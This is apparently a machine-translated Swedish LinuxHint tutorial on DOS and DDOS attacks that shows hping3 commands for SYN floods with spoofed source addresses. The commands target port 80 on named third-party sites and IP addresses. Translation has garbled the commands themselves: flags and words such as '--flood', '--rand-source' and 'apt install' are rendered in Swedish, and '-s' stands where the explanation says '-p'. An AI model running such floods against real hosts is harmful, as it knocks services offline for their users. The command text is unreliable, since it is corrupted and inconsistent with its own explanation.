DOS -attacker
En Denial of Service (DOS) attack är en mycket enkel teknik för att neka tillgång till tjänster (det är därför det kallas denial of service attack). Denna attack består i att överbelasta målet med överdimensionerade paket, eller en stor mängd av dem.
Även om denna attack är mycket enkel att genomföra, äventyrar den inte informationen eller sekretessen för målet, den är inte en penetrativ attack och syftar bara till att förhindra åtkomst till målet.
Genom att skicka en mängd paket kan målet inte hantera angripare som hindrar servern från att betjäna legitima användare.
DOS -attacker utförs från en enda enhet, därför är det enkelt att stoppa dem genom att blockera angriparens IP, men angriparen kan ändra och till och med förfalska (klona) mål -IP -adressen men det är inte svårt för brandväggar att hantera sådana attacker , i motsats till vad som händer med DDOS -attacker.
DDOS -attacker
En Distributed Denial of Service -attack (DDOS) liknar en DOS -attack men utförs från olika noder (eller olika angripare) samtidigt. Vanligtvis utförs DDOS -attacker av botnät. Botnät är automatiska skript eller program som infekterar datorer för att utföra en automatiserad uppgift (i detta fall en DDOS -attack). En hackare kan skapa ett botnät och infektera många datorer från vilka botnät kommer att starta DOS -attacker, det faktum att många botnät skjuter samtidigt gör DOS -attacken till en DDOS -attack (det är därför det kallas distribuerat).
Naturligtvis finns det undantag där DDOS -attacker utfördes av riktiga mänskliga angripare, till exempel hackergruppen Anonym integrerad av tusentals människor över hela världen använde denna teknik mycket ofta på grund av dess enkla implementering (det krävdes bara volontärer som delade deras sak), det är till exempel hur Anonymous lämnade Gaddafis libyska regering helt frånkopplad under invasionen, den libyska staten lämnades försvarslös inför tusentals angripare från hela världen.
Denna typ av attacker, när den utförs från många olika noder är extremt svår att förhindra och stoppa och kräver normalt speciell hårdvara att hantera, detta beror på att brandväggar och defensiva applikationer inte är beredda att hantera tusentals angripare samtidigt. Detta är inte fallet med hping3, de flesta attacker som utförs genom detta verktyg kommer att blockeras av defensiva enheter eller programvara, men det är användbart i lokala nätverk eller mot dåligt skyddade mål.
Om hping3
Med verktyget hping3 kan du skicka manipulerade paket. Med det här verktyget kan du styra paketets storlek, kvantitet och fragmentering för att överbelasta målet och kringgå eller attackera brandväggar. Hping3 kan vara användbart för säkerhets- eller kapacitetsteständamål, med det kan du testa brandväggars effektivitet och om en server kan hantera en stor mängd paket. Nedan hittar du instruktioner om hur du använder hping3 för säkerhetstestning.
Komma igång med DDOS -attacker med hjälp av hping3:
På Debian och baserade Linux -distributioner kan du installera hping3 genom att köra:
#benägenInstallerahping3-och 
En enkel DOS (inte DDOS) attack skulle vara:
#sudohping3-S --översvämning -V -s 80170.155.9.185 
Var:
sudo: ger nödvändiga privilegier för att köra hping3.
hping3: ringer programmet hping3.
-S: anger SYN -paket.
-översvämning: skjuta efter eget gottfinnande, svar ignoreras (det är därför svar inte visas) och paket skickas snabbt som möjligt.
-V: Ordrikedom.
-p 80: port 80, kan du ersätta detta nummer för den tjänst du vill attackera.
170.155.9.185: mål -IP.
Översvämning med SYN -paket mot port 80:
Följande exempel visar en SYN -attack mot lacampora.org:
#sudohping3 lacampora.org-q -n -d 120 -S -s 80 --översvämning -källaVar:
Lacampora.org: är målet
-q: kort utgång
-n: visa mål -IP istället för värd.
-d 120: ange paketstorlek
–Källa: dölj IP -adress.
Följande exempel visar ett annat exempel på översvämning:
SYN översvämning mot hamn 80:
#sudohping3-källaivan.com-S -q -s 80 --översvämning 
Med hping3 kan du också attackera dina mål med en falsk IP, för att kringgå en brandvägg kan du till och med klona din mål -IP själv, eller vilken tillåten adress du än känner (du kan uppnå det till exempel med Nmap eller en sniffer för att lyssna etablerat anslutningar).
Syntaxen skulle vara:
#sudohping3-till <FAKE IP> <mål> -S -q -s 80 --snabbare -c2I detta praktiska exempel verkar attacken:
#sudohping3-till190.0.175.100 190.0.175.100-S -q -s 80 --snabbare -c2 
Jag hoppas att du tyckte att denna handledning på hping3 var användbar. Fortsätt följa LinuxHint för fler tips och uppdateringar om Linux och nätverk.